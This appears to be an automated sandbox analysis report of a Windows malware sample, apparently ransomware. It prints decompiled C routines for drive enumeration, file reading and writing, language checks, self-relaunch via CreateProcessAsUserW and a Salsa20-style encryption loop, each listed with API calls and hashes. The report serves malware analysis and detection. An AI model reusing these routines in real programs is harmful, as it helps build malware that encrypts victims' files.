• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Heap$AllocateFreeObjectQuery_wcsicmp
• String ID:
• API String ID: 326895873-0
• Opcode ID: 7e047ba1f7b80056da61d2c169b64ff700b03b9e6aa90c013a3f3bb26027f0b2
• Instruction ID: 760c0ab6b5da79ca24c1f56f49ae2f4bada72efd6e1d134c9aa42d933db78585
• Opcode Fuzzy Hash: 7e047ba1f7b80056da61d2c169b64ff700b03b9e6aa90c013a3f3bb26027f0b2
• Instruction Fuzzy Hash: 29019E31904A05FFDB108F90DD44B6EBB76EF04305F50487BE519B65A0E33A551A9F1A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E004055AB() {
    long _t29;
    void* _t32;
    void* _t38;
    void* _t41;
    intOrPtr* _t50;
    void* _t53;
    void* _t55;
    void* _t58;

    while(1) {
        _t29 = NtQueryObject(0, 3,  *(_t55 - 0xc),  *(_t55 - 0x10), _t55 - 0x10);
        if(_t29 == 0) {
            break;
        }
        if(_t29 != 0xc0000004) {
            return RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
        } else {
            *(_t55 - 0x10) =  *(_t55 - 0x10) + 0x28;
            *(_t55 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t55 - 0xc),  *(_t55 - 0x10));
            continue;
        }
        L17:
    }
    _t50 = _t55 - 0x1c;
    *_t50 = 0x690046;
    *((intOrPtr*)(_t50 + 4)) = 0x65006c;
    *(_t50 + 8) = 0;
    _t53 =  *(_t55 - 0xc);
    asm("lodsd");
    *(_t55 - 8) = _t29;
    _t41 = 0;
    while(1) {
        _t32 =  *0x40f694( *((intOrPtr*)(_t53 + 4)), _t50);
        _t58 = _t58 + 8;
        if(_t32 == 0) {
            break;
        }
        _t53 = (( *(_t53 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t53 + 0x60;
        _t41 = _t41 + 1;
        *(_t55 - 8) =  *(_t55 - 8) - 1;
        if( *(_t55 - 8) != 0) {
            continue;
        }
        L16:
        RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
        return  *(_t55 - 4);
        goto L17;
    }
    _t38 = E004016D2();
    if(_t38 < 0x3f) {
        if(_t38 < 0x3d) {
            *(_t55 - 4) = _t41 + 1;
        } else {
            *(_t55 - 4) = _t41 + 2;
        }
    } else {
        *(_t55 - 4) =  *(_t53 + 0x52) & 0x000000ff;
    }
    goto L16;
}


APIs
• NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
• RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
• _wcsicmp.NTDLL ref: 00405613
• RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Heap$AllocateFreeObjectQuery_wcsicmp
• String ID:
• API String ID: 326895873-0
• Opcode ID: afec9a4218ff9c831d752a56371dd012f059887f93db8aa9a3e8330b526c3806
• Instruction ID: 760c0ab6b5da79ca24c1f56f49ae2f4bada72efd6e1d134c9aa42d933db78585
• Opcode Fuzzy Hash: afec9a4218ff9c831d752a56371dd012f059887f93db8aa9a3e8330b526c3806
• Instruction Fuzzy Hash: 29019E31904A05FFDB108F90DD44B6EBB76EF04305F50487BE519B65A0E33A551A9F1A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00401C9B(WCHAR* _a4, void* _a8, long _a12) {
    struct _OVERLAPPED* _v8;
    void* _v12;
    long _v16;

    _v8 = 0;
    _v12 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
    if(_v12 != 0xffffffff) {
        if(WriteFile(_v12, _a8, _a12,  &_v16, 0) != 0) {
            _v8 = 1;
        }
        NtClose(_v12);
    }
    return _v8;
}


APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
• WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
• NtClose.NTDLL(000000FF), ref: 00401CF4
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: File$CloseCreateWrite
• String ID:
• API String ID: 2708586012-0
• Opcode ID: ad385981a648b5fe2b05872c062b652e82e760caa543c8e3a96ab9f6936c59d3
• Instruction ID: 1974dd5ebe6ed98fcf9c69dfc64631ac640ae5c4b5b8df812f88ab431a2d9327
• Opcode Fuzzy Hash: ad385981a648b5fe2b05872c062b652e82e760caa543c8e3a96ab9f6936c59d3
• Instruction Fuzzy Hash: B801A471640208FFEB208F84DD49F9EBB78FB44720F204179FA14B61E0D7716A149B58
Uniqueness

Uniqueness Score: -1.00%


C-Code - Quality: 100%
E00407D2C(void* _a4, wchar_t* _a8) {
    void* _v8;
    short _v528;
    long _t9;

    _t9 = GetModuleFileNameW(0,  &_v528, 0x104);
    if(_t9 != 0) {
        E00406C06(_a4,  &_v528, _a8, 0,  &_v8, 0);
        WaitForSingleObject(_v8, 0xffffffff);
        return NtClose(_v8);
    }
    return _t9;
}


APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00407D48
  • Part of subcall function 00406C06: wcslen.NTDLL ref: 00406C17
  • Part of subcall function 00406C06: wcslen.NTDLL ref: 00406C25
  • Part of subcall function 00406C06: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406C40
  • Part of subcall function 00406C06: wcschr.NTDLL ref: 00406C5E
  • Part of subcall function 00406C06: _swprintf.NTDLL ref: 00406D1B
  • Part of subcall function 00406C06: memset.NTDLL ref: 00406D2C
  • Part of subcall function 00406C06: memset.NTDLL ref: 00406D3D
  • Part of subcall function 00406C06: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00080004,00000000,00000000,00000048,?,00000000), ref: 00406D86
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00408F55,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00407D71
• NtClose.NTDLL(00000000), ref: 00407D7A
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: memsetwcslen$AllocateCloseCreateFileHeapModuleNameObjectProcessSingleUserWait_swprintfwcschr
• String ID:
• API String ID: 1334208447-0
• Opcode ID: 5ac6077f3af6ac1aa44279721be763aa23cd986afb219f957f31ac8be0e69585
• Instruction ID: 2e8e3fa4fc80ccb4d7dfb1b8bf3a49c2a4f96619ffa4aa74f04a4a0027a3174c
• Opcode Fuzzy Hash: 5ac6077f3af6ac1aa44279721be763aa23cd986afb219f957f31ac8be0e69585
• Instruction Fuzzy Hash: BAF03071504208BEEB20AB95EE4AFAA7B7CEB40721F204276FA14A10E0D6715E189B65
Uniqueness

Uniqueness Score: -1.00%


APIs
• NtQueryInstallUILanguage.NTDLL(?), ref: 00402E53
• NtQueryDefaultUILanguage.NTDLL(?), ref: 00402E60
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: LanguageQuery$DefaultInstall
• String ID:
• API String ID: 3486302093-0
• Opcode ID: 78f0727969a249eb182f1bb240e477d9712b2c1ba6864d0ed8f5fbedc8f6bafb
• Instruction ID: e39af1da2e6860be224d287dedfbe5131a3577809dd2bae484e6a594123721a3
• Opcode Fuzzy Hash: 78f0727969a249eb182f1bb240e477d9712b2c1ba6864d0ed8f5fbedc8f6bafb
• Instruction Fuzzy Hash: 5231DF62BC65175AFE35E014974D6E7A228A3547E0EED1173884A732C281FC0D82A6AF
Uniqueness

Uniqueness Score: -1.00%


                                                                                        C-Code - Quality: 100%
                                                                                        			E00403E86() {
                                                                                        				short _v524;
                                                                                        				int _t5;
                                                                                        				unsigned int _t6;
                                                                                        				unsigned int _t7;
                                                                                        				WCHAR* _t8;
                                                                                        
                                                                                        				_t5 = GetLogicalDriveStringsW(0x104,  &_v524);
                                                                                        				_t6 = _t5;
                                                                                        				if(_t6 != 0) {
                                                                                        					_t7 = _t6 >> 2;
                                                                                        					_t8 =  &_v524;
                                                                                        					do {
                                                                                        						_t5 = GetDriveTypeW(_t8);
                                                                                        						if(_t5 == 3 || _t5 == 2) {
                                                                                        							_t5 = E00403EDD(_t8);
                                                                                        						}
                                                                                        						_t8 =  &(_t8[4]);
                                                                                        						_t7 = _t7 - 1;
                                                                                        					} while (_t7 != 0);
                                                                                        				}
                                                                                        				return _t5;
                                                                                        			}









                                                                                        APIs
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000104,?,?,?,?,?,00000000), ref: 00403EA0
                                                                                        • GetDriveTypeW.KERNEL32(?,?,?,?,?,00000000), ref: 00403EB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Drive$LogicalStringsType
                                                                                        • String ID:
                                                                                        • API String ID: 1630765265-0
                                                                                        • Opcode ID: b46be5a0fdbe81601177f82fdca0ff7374879a232e80252c26acf136bff77857
                                                                                        • Instruction ID: c7065a20642a4d2de60da224c9e94cf6a6979ade130220f2db004efeaae0ece5
                                                                                        • Opcode Fuzzy Hash: b46be5a0fdbe81601177f82fdca0ff7374879a232e80252c26acf136bff77857
                                                                                        • Instruction Fuzzy Hash: EAF027366007195BDA306A95EC89CAB7B6CCB45312B000377EE04F2180DA74AE4B85E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 35%
                                                                                        			E00405CC1() {
                                                                                        				void* _t20;
                                                                                        				void* _t34;
                                                                                        
                                                                                        				asm("sbb edx, 0x0");
                                                                                        				_push(2);
                                                                                        				if(SetFilePointerEx( *(_t34 - 8), 0xffffffffffffff70, 0, 0) != 0) {
                                                                                        					if(ReadFile( *(_t34 - 8), _t34 - 0x9c, 0x90, _t34 - 0xc, 0) != 0) {
                                                                                        						_t20 = E00401060(_t34 - 0x9c, 0x80, 0);
                                                                                        						_push(0x10);
                                                                                        						_push(_t34 - 0x1c);
                                                                                        						_push(_t20);
                                                                                        						if( *0x40f670() == 0) {
                                                                                        							 *((intOrPtr*)(_t34 - 4)) = 1;
                                                                                        						}
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)(_t34 - 4)) =  *[fs:0x34];
                                                                                        					}
                                                                                        				} else {
                                                                                        					if( *[fs:0x34] != 0x83) {
                                                                                        						 *((intOrPtr*)(_t34 - 4)) =  *[fs:0x34];
                                                                                        					}
                                                                                        				}
                                                                                        				if( *(_t34 - 8) != 0xffffffff) {
                                                                                        					NtClose( *(_t34 - 8));
                                                                                        				}
                                                                                        				return  *((intOrPtr*)(_t34 - 4));
                                                                                        			}






                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(000000FF,-00000090,00000000,00000000,00000002,?,?,?,?), ref: 00405CEC
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000090,?,00000000,?,?,?,?), ref: 00405D23
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405D71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: File$ClosePointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 2610616218-0
                                                                                        • Opcode ID: 777679eeb5391a949941078411e3c8d80bb8c7921023074cda048503db83794f
                                                                                        • Instruction ID: e92401d7cf86449c993ab257dce1736fd4b3aade3a58129e992005261cb14f8b
                                                                                        • Opcode Fuzzy Hash: 777679eeb5391a949941078411e3c8d80bb8c7921023074cda048503db83794f
                                                                                        • Instruction Fuzzy Hash: 79F0E936604A44EBEB208B24ED08B6FB7B4EB80B11F20C573D501F15D0D2381A06ED19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004022D9(void _a4) {
                                                                                        
                                                                                        				 *0x40f94c = _a4;
                                                                                        				 *0x40f94c =  *0x40f94c << 8;
                                                                                        				NtSetInformationProcess(0xffffffff, 0x12, 0x40f94c, 2);
                                                                                        				 *0x40f94c =  *0x40f94c >> 8;
                                                                                        				return NtSetInformationProcess(0xffffffff, 0x21, 0x40f94c, 4);
                                                                                        			}




                                                                                        APIs
                                                                                        • NtSetInformationProcess.NTDLL(000000FF,00000012,0040F94C,00000002), ref: 004022FB
                                                                                        • NtSetInformationProcess.NTDLL(000000FF,00000021,0040F94C,00000004), ref: 00402313
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: InformationProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1801817001-0
                                                                                        • Opcode ID: 233619b2467464f1296a7e77ead386fe23076a04fc59532b68dded45d6556d98
                                                                                        • Instruction ID: 53fea944ceca1c063ec8bef7243d3de7c7776cb26b34a42578b57734461a406d
                                                                                        • Opcode Fuzzy Hash: 233619b2467464f1296a7e77ead386fe23076a04fc59532b68dded45d6556d98
                                                                                        • Instruction Fuzzy Hash: 24E09BB12463047EE1305B49AD0AF527758D360B71F104237F220F14E1D1B124188A79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 43%
                                                                                        			E00404A88(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                        				char _v5;
                                                                                        				char _v84;
                                                                                        				char _v164;
                                                                                        				char _v244;
                                                                                        				signed int _v248;
                                                                                        				signed int _v252;
                                                                                        				signed int _v256;
                                                                                        				signed int _v260;
                                                                                        				signed int _t122;
                                                                                        				signed int _t123;
                                                                                        				signed int _t125;
                                                                                        				signed int _t127;
                                                                                        				signed int _t129;
                                                                                        				signed int _t131;
                                                                                        				signed int _t133;
                                                                                        				signed int _t135;
                                                                                        				signed int _t137;
                                                                                        				intOrPtr _t142;
                                                                                        				signed int _t144;
                                                                                        				signed int _t146;
                                                                                        				signed int _t148;
                                                                                        				signed int _t150;
                                                                                        				signed int _t152;
                                                                                        				signed int _t154;
                                                                                        				signed int _t156;
                                                                                        				signed int _t158;
                                                                                        				signed int _t159;
                                                                                        				signed int _t161;
                                                                                        				signed int _t163;
                                                                                        				signed int _t165;
                                                                                        				signed int _t167;
                                                                                        				signed int _t169;
                                                                                        				signed int _t171;
                                                                                        				signed int _t173;
                                                                                        				signed int _t175;
                                                                                        				intOrPtr _t176;
                                                                                        				intOrPtr _t177;
                                                                                        				signed int _t178;
                                                                                        				signed int _t179;
                                                                                        				signed int _t180;
                                                                                        				signed int _t181;
                                                                                        				signed int _t182;
                                                                                        				signed int _t183;
                                                                                        				signed int _t184;
                                                                                        				signed int _t185;
                                                                                        				signed int _t186;
                                                                                        				signed int _t187;
                                                                                        				signed int _t188;
                                                                                        				signed int _t189;
                                                                                        				signed int _t190;
                                                                                        				signed int _t191;
                                                                                        				signed int _t192;
                                                                                        				signed int _t193;
                                                                                        				signed int _t194;
                                                                                        				intOrPtr _t195;
                                                                                        				signed int* _t197;
                                                                                        				signed int _t198;
                                                                                        				intOrPtr _t199;
                                                                                        				signed int _t270;
                                                                                        				signed int _t271;
                                                                                        
                                                                                        				_v248 =  &_v84 + 0x0000000f & 0xfffffff0;
                                                                                        				_v252 =  &_v164 + 0x0000000f & 0xfffffff0;
                                                                                        				_t122 =  &_v244 + 0x0000000f & 0xfffffff0;
                                                                                        				_v256 = _t122;
                                                                                        				if(_a16 != 0) {
                                                                                        					asm("xorps xmm0, xmm0");
                                                                                        					asm("movups [esi], xmm0");
                                                                                        					asm("movups [esi+0x10], xmm0");
                                                                                        					asm("movups [esi+0x20], xmm0");
                                                                                        					asm("movups [esi+0x30], xmm0");
                                                                                        					asm("movups xmm0, [esi]");
                                                                                        					asm("movups xmm1, [esi+0x10]");
                                                                                        					asm("movups xmm2, [esi+0x20]");
                                                                                        					asm("movups xmm3, [esi+0x30]");
                                                                                        					asm("movups [edi], xmm0");
                                                                                        					asm("movups [edi+0x10], xmm1");
                                                                                        					asm("movups [edi+0x20], xmm2");
                                                                                        					asm("movups [edi+0x30], xmm3");
                                                                                        					do {
                                                                                        						if(_a16 < 0x40) {
                                                                                        							_v260 = _a12;
                                                                                        							_t194 = _v256;
                                                                                        							_t198 = _t194;
                                                                                        							_t270 = _a8;
                                                                                        							_t176 = _a16;
                                                                                        							do {
                                                                                        								 *((char*)(_t198 + _t176 - 1)) =  *((intOrPtr*)(_t270 + _t176 - 1));
                                                                                        								_t176 = _t176 - 1;
                                                                                        							} while (_t176 != 0);
                                                                                        							_a8 = _t194;
                                                                                        							_a12 = _t194;
                                                                                        						}
                                                                                        						_t197 = _v252;
                                                                                        						asm("movups xmm0, [esi]");
                                                                                        						asm("movups xmm1, [esi+0x10]");
                                                                                        						asm("movups xmm2, [esi+0x20]");
                                                                                        						asm("movups xmm3, [esi+0x30]");
                                                                                        						asm("movups [edi], xmm0");
                                                                                        						asm("movups [edi+0x10], xmm1");
                                                                                        						asm("movups [edi+0x20], xmm2");
                                                                                        						asm("movups [edi+0x30], xmm3");
                                                                                        						_push(_v248);
                                                                                        						do {
                                                                                        							_t123 =  *_t197;
                                                                                        							_t178 = _t197[0xc];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t144 = _t197[4] ^ _t123 + _t178;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t161 = _t197[8] ^ _t144 + _t123;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t179 = _t178 ^ _t161 + _t144;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							 *_t197 = _t123 ^ _t179 + _t161;
                                                                                        							_t197[4] = _t144;
                                                                                        							_t197[8] = _t161;
                                                                                        							_t197[0xc] = _t179;
                                                                                        							_t125 = _t197[5];
                                                                                        							_t180 = _t197[1];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t146 = _t197[9] ^ _t125 + _t180;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t163 = _t197[0xd] ^ _t146 + _t125;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t181 = _t180 ^ _t163 + _t146;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t197[5] = _t125 ^ _t181 + _t163;
                                                                                        							_t197[9] = _t146;
                                                                                        							_t197[0xd] = _t163;
                                                                                        							_t197[1] = _t181;
                                                                                        							_t127 = _t197[0xa];
                                                                                        							_t182 = _t197[6];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t148 = _t197[0xe] ^ _t127 + _t182;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t165 = _t197[2] ^ _t148 + _t127;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t183 = _t182 ^ _t165 + _t148;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t197[0xa] = _t127 ^ _t183 + _t165;
                                                                                        							_t197[0xe] = _t148;
                                                                                        							_t197[2] = _t165;
                                                                                        							_t197[6] = _t183;
                                                                                        							_t129 = _t197[0xf];
                                                                                        							_t184 = _t197[0xb];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t150 = _t197[3] ^ _t129 + _t184;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t167 = _t197[7] ^ _t150 + _t129;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t185 = _t184 ^ _t167 + _t150;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t197[0xf] = _t129 ^ _t185 + _t167;
                                                                                        							_t197[3] = _t150;
                                                                                        							_t197[7] = _t167;
                                                                                        							_t197[0xb] = _t185;
                                                                                        							_t131 =  *_t197;
                                                                                        							_t186 = _t197[3];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t152 = _t197[1] ^ _t131 + _t186;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t169 = _t197[2] ^ _t152 + _t131;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t187 = _t186 ^ _t169 + _t152;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							 *_t197 = _t131 ^ _t187 + _t169;
                                                                                        							_t197[1] = _t152;
                                                                                        							_t197[2] = _t169;
                                                                                        							_t197[3] = _t187;
                                                                                        							_t133 = _t197[5];
                                                                                        							_t188 = _t197[4];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t154 = _t197[6] ^ _t133 + _t188;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t171 = _t197[7] ^ _t154 + _t133;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t189 = _t188 ^ _t171 + _t154;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t197[5] = _t133 ^ _t189 + _t171;
                                                                                        							_t197[6] = _t154;
                                                                                        							_t197[7] = _t171;
                                                                                        							_t197[4] = _t189;
                                                                                        							_t135 = _t197[0xa];
                                                                                        							_t190 = _t197[9];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t156 = _t197[0xb] ^ _t135 + _t190;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t173 = _t197[8] ^ _t156 + _t135;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t191 = _t190 ^ _t173 + _t156;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t197[0xa] = _t135 ^ _t191 + _t173;
                                                                                        							_t197[0xb] = _t156;
                                                                                        							_t197[8] = _t173;
                                                                                        							_t197[9] = _t191;
                                                                                        							_t137 = _t197[0xf];
                                                                                        							_t192 = _t197[0xe];
                                                                                        							asm("rol esi, 0x7");
                                                                                        							_t158 = _t197[0xc] ^ _t137 + _t192;
                                                                                        							asm("rol esi, 0x9");
                                                                                        							_t175 = _t197[0xd] ^ _t158 + _t137;
                                                                                        							asm("rol esi, 0xd");
                                                                                        							_t193 = _t192 ^ _t175 + _t158;
                                                                                        							asm("rol esi, 0x12");
                                                                                        							_t122 = _t137 ^ _t193 + _t175;
                                                                                        							_t197[0xf] = _t122;
                                                                                        							_t197[0xc] = _t158;
                                                                                        							_t197[0xd] = _t175;
                                                                                        							_t197[0xe] = _t193;
                                                                                        						} while ( &_v5 != 0);
                                                                                        						_pop(_t272);
                                                                                        						asm("movq mm0, [edi]");
                                                                                        						asm("movq mm1, [edi+0x8]");
                                                                                        						asm("movq mm2, [edi+0x10]");
                                                                                        						asm("movq mm3, [edi+0x18]");
                                                                                        						asm("movq mm4, [edi+0x20]");
                                                                                        						asm("movq mm5, [edi+0x28]");
                                                                                        						asm("movq mm6, [edi+0x30]");
                                                                                        						asm("movq mm7, [edi+0x38]");
                                                                                        						asm("paddd mm0, [esi]");
                                                                                        						asm("paddd mm1, [esi+0x8]");
                                                                                        						asm("paddd mm2, [esi+0x10]");
                                                                                        						asm("paddd mm3, [esi+0x18]");
                                                                                        						asm("paddd mm4, [esi+0x20]");
                                                                                        						asm("paddd mm5, [esi+0x28]");
                                                                                        						asm("paddd mm6, [esi+0x30]");
                                                                                        						asm("paddd mm7, [esi+0x38]");
                                                                                        						asm("movq [edi], mm0");
                                                                                        						asm("movq [edi+0x8], mm1");
                                                                                        						asm("movq [edi+0x10], mm2");
                                                                                        						asm("movq [edi+0x18], mm3");
                                                                                        						asm("movq [edi+0x20], mm4");
                                                                                        						asm("movq [edi+0x28], mm5");
                                                                                        						asm("movq [edi+0x30], mm6");
                                                                                        						asm("movq [edi+0x38], mm7");
                                                                                        						asm("movups xmm0, [esi]");
                                                                                        						asm("movups xmm1, [esi+0x10]");
                                                                                        						asm("movups xmm2, [esi+0x20]");
                                                                                        						asm("movups xmm3, [esi+0x30]");
                                                                                        						asm("xorps xmm0, [edi]");
                                                                                        						asm("xorps xmm1, [edi+0x10]");
                                                                                        						asm("xorps xmm2, [edi+0x20]");
                                                                                        						asm("xorps xmm3, [edi+0x30]");
                                                                                        						asm("movups [esi], xmm0");
                                                                                        						asm("movups [esi+0x10], xmm1");
                                                                                        						asm("movups [esi+0x20], xmm2");
                                                                                        						asm("movups [esi+0x30], xmm3");
                                                                                        						_t159 = _v248;
                                                                                        						 *((intOrPtr*)(_t159 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20)) + 1;
                                                                                        						if( *((intOrPtr*)(_t159 + 0x20)) == 0) {
                                                                                        							 *((intOrPtr*)(_t159 + 0x24)) =  *((intOrPtr*)(_t159 + 0x24)) + 1;
                                                                                        						}
                                                                                        						if(_a16 <= 0x40 && _a16 < 0x40) {
                                                                                        							_t177 = _a16;
                                                                                        							_t271 = _a12;
                                                                                        							_t199 = _v260;
                                                                                        							do {
                                                                                        								 *((char*)(_t199 + _t177 - 1)) =  *((intOrPtr*)(_t271 + _t177 - 1));
                                                                                        								_t177 = _t177 - 1;
                                                                                        							} while (_t177 != 0);
                                                                                        							_t195 = _a4;
                                                                                        							 *((intOrPtr*)(_t195 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20));
                                                                                        							_t142 =  *((intOrPtr*)(_t159 + 0x24));
                                                                                        							 *((intOrPtr*)(_t195 + 0x24)) = _t142;
                                                                                        							return _t142;
                                                                                        						}
                                                                                        						_a12 = _a12 + 0x40;
                                                                                        						_a8 = _a8 + 0x40;
                                                                                        						_a16 = _a16 - 0x40;
                                                                                        					} while (_a16 != 0);
                                                                                        				}
                                                                                        				return _t122;
                                                                                        			}

                                                                                        0x00404a9f
                                                                                        0x00404ab1
                                                                                        0x00404ac0
                                                                                        0x00404ac3
                                                                                        0x00404acd
                                                                                        0x00404ad9
                                                                                        0x00404adc
                                                                                        0x00404adf
                                                                                        0x00404ae3
                                                                                        0x00404ae7
                                                                                        0x00404af4
                                                                                        0x00404af7
                                                                                        0x00404afb
                                                                                        0x00404aff
                                                                                        0x00404b03
                                                                                        0x00404b06
                                                                                        0x00404b0a
                                                                                        0x00404b0e
                                                                                        0x00404b12
                                                                                        0x00404b16
                                                                                        0x00404b1b
                                                                                        0x00404b21
                                                                                        0x00404b27
                                                                                        0x00404b29
                                                                                        0x00404b2c
                                                                                        0x00404b2f
                                                                                        0x00404b33
                                                                                        0x00404b37
                                                                                        0x00404b38
                                                                                        0x00404b3c
                                                                                        0x00404b3f
                                                                                        0x00404b3f
                                                                                        0x00404b48
                                                                                        0x00404b4e
                                                                                        0x00404b51
                                                                                        0x00404b55
                                                                                        0x00404b59
                                                                                        0x00404b5d
                                                                                        0x00404b60
                                                                                        0x00404b64
                                                                                        0x00404b68
                                                                                        0x00404b6d
                                                                                        0x00404b73
                                                                                        0x00404b73
                                                                                        0x00404b7b
                                                                                        0x00404b82
                                                                                        0x00404b85
                                                                                        0x00404b8b
                                                                                        0x00404b8e
                                                                                        0x00404b94
                                                                                        0x00404b97
                                                                                        0x00404b9d
                                                                                        0x00404ba2
                                                                                        0x00404ba4
                                                                                        0x00404ba7
                                                                                        0x00404baa
                                                                                        0x00404bad
